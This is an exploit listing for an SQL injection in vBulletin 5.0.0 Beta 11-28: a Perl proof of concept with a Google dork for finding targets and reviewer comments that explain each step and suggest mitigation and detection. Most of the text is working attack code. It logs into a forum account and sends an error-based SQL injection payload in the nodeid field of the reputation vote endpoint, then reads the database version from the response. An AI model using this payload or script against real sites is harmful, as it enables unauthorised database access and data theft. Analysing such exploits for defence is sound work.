
# Title : vBulletin 5.0.0 Beta 11 - 5.0.0 Beta 28 - SQL Injection
# Published : 2013-03-25
# Author :


# Exploit Title: vBulletin 5 Beta XX SQLi 0day
# Google Dork: "Powered by vBulletin? Version 5.0.0 Beta"
# Date: 24/03/2013
# Exploit Author: Orestis Kourides
# Vendor Homepage: www.vbulletin.com
# Software Link: 
# Version: 5.0.0 Beta 11 - 5.0.0 Beta 28
# Tested on: Linux
# CVE : None

#!/usr/bin/perl
# Proof-of-concept for the vBulletin 5.0.0 Beta 11-28 SQL injection named in
# the header above.  The code is unchanged; the comments explain each step
# from a reviewer's (defender's) point of view.
#
# Code-quality notes: there is no `use strict; use warnings;`, so the package
# globals below ($host, $path, ...) and the two `my $browser` declarations go
# unreported.  The "rn" / "n" inside the print strings look like "\r\n" / "\n"
# escapes lost when this listing was extracted — TODO confirm against the
# original file.  `User-Agent => ...` is not quoted, so Perl does not read it
# as a header name (it parses as a subtraction of two barewords).
use LWP::UserAgent;
use HTTP::Cookies;
use HTTP::Request::Common;
use MIME::Base64;
# Clear the terminal: $^O is the OS name, so Windows gets 'cls', others 'clear'.
system $^O eq 'MSWin32' ? 'cls' : 'clear';
print "
+===================================================+
|           vBulletin 5 Beta XX SQLi 0day           |
|              Author: Orestis Kourides             |
|             Web Site: www.cyitsec.net             |
+===================================================+
";
 
# Five positional arguments: host, vBulletin path, a forum username and
# password, and a "magic number" that is later sent as the nodeid parameter.
if (@ARGV != 5) {
    print "rnUsage: perl vb5exp.pl WWW.HOST.COM VBPATH URUSER URPASS MAGICNUMrn";
    exit;
}
 
$host		= $ARGV[0];
$path		= $ARGV[1];
$username	= $ARGV[2];
$password	= $ARGV[3];
$magicnum	= $ARGV[4];
# The login form's 'url' field (the forum's own URL) is sent base64-encoded.
$encpath	= encode_base64('http://'.$host.$path);
print "[+] Loggingn";
print "[+] Username: ".$username."n";
print "[+] Password: ".$password."n";
print "[+] MagicNum: ".$magicnum."n";
print "[+] " .$host.$path."auth/loginn";
# Step 1: authenticate with an ordinary forum account.  The injection is only
# attempted after this login, which suggests the vulnerable endpoint expects a
# logged-in session (i.e. any registered user) — not verifiable from here.
my $browser = LWP::UserAgent->new;
my $cookie_jar = HTTP::Cookies->new;
my $response = $browser->post( 'http://'.$host.$path.'auth/login',
    [
		'url' => $encpath,
		'username' => $username,
		'password' => $password,
	],
	Referer => 'http://'.$host.$path.'auth/login-form?url=http://'.$host.$path.'',
	User-Agent => 'Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0',
);
$browser->cookie_jar( $cookie_jar );
my $browser = LWP::UserAgent->new;
$browser->cookie_jar( $cookie_jar );
print "[+] Requestingn";
# Step 2: the vulnerable request.  nodeid (presumably a numeric node id) is
# sent as the supplied number followed by a SQL fragment, which only has an
# effect if the server concatenates nodeid into its query unescaped.  The
# fragment wraps version() in 0x23 ('#') markers so the value can be picked
# out of the response body below; the response is apparently expected to echo
# it (e.g. inside a database error message).
#
# Mitigation: validate nodeid as an integer (or bind it as a query parameter)
# before it reaches the database, and never return raw DB error text to
# clients.  Detection: requests to index.php/ajax/api/reputation/vote whose
# nodeid is not purely numeric are a clear signature for this probe.
my $response = $browser->post( 'http://'.$host.$path.'index.php/ajax/api/reputation/vote',
    [
		'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast(version() as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338',
	],
	User-Agent => 'Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0',
);
$data = $response->content;
# Pull the first '#...#'-delimited token out of the response body (the
# markers added by the payload above) and print it as the DB version string.
if ($data =~ /(#((\.)|[^\#])*#)/) { print '[+] Version: '.$1 };
print "n";
# Exits non-zero on every path, including success.
exit 1;